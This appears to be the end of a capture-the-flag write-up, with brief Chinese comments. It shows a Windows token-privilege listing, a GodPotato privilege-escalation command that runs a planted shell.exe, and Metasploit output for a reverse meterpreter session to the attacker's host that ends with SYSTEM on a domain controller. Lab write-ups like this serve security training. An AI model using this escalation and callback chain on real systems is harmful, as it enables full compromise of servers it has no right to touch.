SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

随便找个土豆提权,搞定

C:\users\sqlsvc\Documents>.\GodPotato-NET4.exe  -cmd "cmd /c C:\users\sqlsvc\Documents\shell.exe"
.\GodPotato-NET4.exe  -cmd "cmd /c C:\users\sqlsvc\Documents\shell.exe"
[*] CombaseModule: 0x140712362377216
[*] DispatchTable: 0x140712364964168
[*] UseProtseqFunction: 0x140712364257472
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ee30b0eb-3444-427c-a150-41c7a1bf125d\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00002002-0660-ffff-b35f-eef0a3c42949
[*] DCOM obj OXID: 0x535f01d97b4a2461
[*] DCOM obj OID: 0xeb87aa8a01016c28
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 924 Token:0x760  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5628
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Staging x64 payload (204892 bytes) ...
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] Session ID 2 (10.10.16.23:4444 -> 10.129.234.66:58176) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: shell.exe (1896)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2504

C:\users\sqlsvc\Documents>[+] Successfully migrated into process 2504
[*] Meterpreter session 2 opened (10.10.16.23:4444 -> 10.129.234.66:58176) at 2025-09-18 09:32:55 -0400
exity^H
exity
'exit' is not recognized as an internal or external command,
operable program or batch file.

C:\users\sqlsvc\Documents>exit
exit
meterpreter > exit
[*] Shutting down session: 1

[*] 10.129.234.66 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
Process 2564 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\users\sqlsvc\Documents>whoami
whoami
nt authority\system

flag就在管理员目录,懒得放过来了